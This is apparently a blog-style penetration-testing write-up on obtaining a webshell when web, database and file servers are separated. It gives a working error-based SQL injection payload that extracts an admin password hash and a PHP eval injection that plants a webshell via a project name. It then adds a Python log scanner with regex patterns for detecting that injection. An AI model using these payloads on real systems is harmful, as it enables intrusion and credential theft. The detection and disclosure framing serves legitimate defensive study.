This started as a conversation with a friend about the security implications of upgrading a server deployment architecture. From the single all-in-one server to the separation of application, database and file servers; from a server in a local machine room to a cloud provider's product matrix; from virtualization to containerized deployment, each step has shifted the overall posture toward greater security.
This article constructs a scenario in which the source code runs on ECS, the database lives in RDS, and unstructured data is stored in HDFS. The usual getShell techniques, such as writing files through SQL injection, arbitrary file upload, or file inclusion, no longer seem to work, because the web server, the database and the file store are now separate systems. In that situation, how does one break through the deployment architecture and obtain a webshell on the website?
Black box penetration test + white box code audit
During information gathering, locate the site's admin backend and inspect the source of the login page; this reveals that the system is probably built on a known CMS. Download the open-source CMS code and audit it, tracing a path from a front-end SQL injection to getShell in the admin backend.
Exploitation process on a CMS demonstration site:
1. Use the front-end SQL injection in the search function, placing the payload in the keyword parameter (error-based injection via floor(rand(0)*2) with group by):
keyword=1%' or (select 1 from (select count(*),concat((concat(0x5e5e21,(select concat(0x7c,password,0x7c) from xxxxx_user where uid=1),0x215e5e)),floor(rand(0)*2))x from information_schema.tables group by x)a)#
The error message leaks the MD5 hash 21232f297a57a5a743894a0e4a801fc3, which cracks to admin.
Log in to the admin backend successfully with the weak password admin/admin.
2. In the admin backend, select Home > Project Management > Create project, and enter the payload as the project name: test111',eval($_POST[g]),//
3. Access the webshell address:
PS: The vulnerability in the case cited here was submitted to the authorities in November 2018 and has since been fixed.
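From the defender's side, the first step of the walkthrough above leaves a very recognizable trace in the web server's access log. The following Python script is an added example, not part of the original article or the CMS: it parses constructed access log lines in common log format, URL-decodes the query parameters, and flags requests that match several indicators of the error-based injection pattern (information_schema, floor(rand(), a group-by alias, hex literals, a trailing comment). The log lines, IP addresses and the search.php path are constructed sample data.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators of the error-based (floor(rand(0)*2) / group by) injection seen in the walkthrough.
# Each regex is applied to a fully decoded parameter value.
SQLI_INDICATORS = {
    "information_schema": re.compile(r"information_schema\.", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by_alias": re.compile(r"group\s+by\s+\w+\s*\)", re.I),
    "hex_literal": re.compile(r"0x[0-9a-f]{2,}", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)\s*$"),
}

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines: one carrying the injection from step 1, one benign search.
LOG_LINES = [
    '203.0.113.7 - - [10/Nov/2018:10:21:03 +0800] "GET /search.php?keyword=1%25%27+or+(select+1+from+'
    '(select+count(*),concat((concat(0x5e5e21,(select+concat(0x7c,password,0x7c)+from+xxxxx_user+where+uid=1),'
    '0x215e5e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 500 1203',
    '198.51.100.4 - - [10/Nov/2018:10:22:11 +0800] "GET /search.php?keyword=cloud+security HTTP/1.1" 200 8812',
]


def classify_request(path):
    """Return the set of indicator names matched by any decoded query parameter value."""
    hits = set()
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode: payloads are often double-encoded
        for name, pattern in SQLI_INDICATORS.items():
            if pattern.search(value):
                hits.add(name)
    return hits


def scan_log(lines, min_hits=2):
    """Return (ip, path, sorted_hits) for each request matching at least min_hits indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        hits = classify_request(m.group("path"))
        if len(hits) >= min_hits:
            findings.append((m.group("ip"), m.group("path"), sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(LOG_LINES):
        print(ip, hits)
```

Requiring two or more indicators keeps a lone hex literal or a stray "#" in a legitimate search from raising an alert; the threshold is a tunable, not a guarantee.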
Upgrading the technical architecture can greatly reduce some classes of security risk, and the vulnerabilities found by black-box penetration testing will undoubtedly become harder to exploit. With the microservice architectures that are popular today, systems will have more and more usage scenarios, and this is also a major challenge for the tester: you may think you have gained access to the whole system, when in fact you have only reached one service within it.
I like this sentence very much; it is brief and enlightening: vulnerabilities are found in the details, problems are solved in the architecture, and risks are controlled in the process.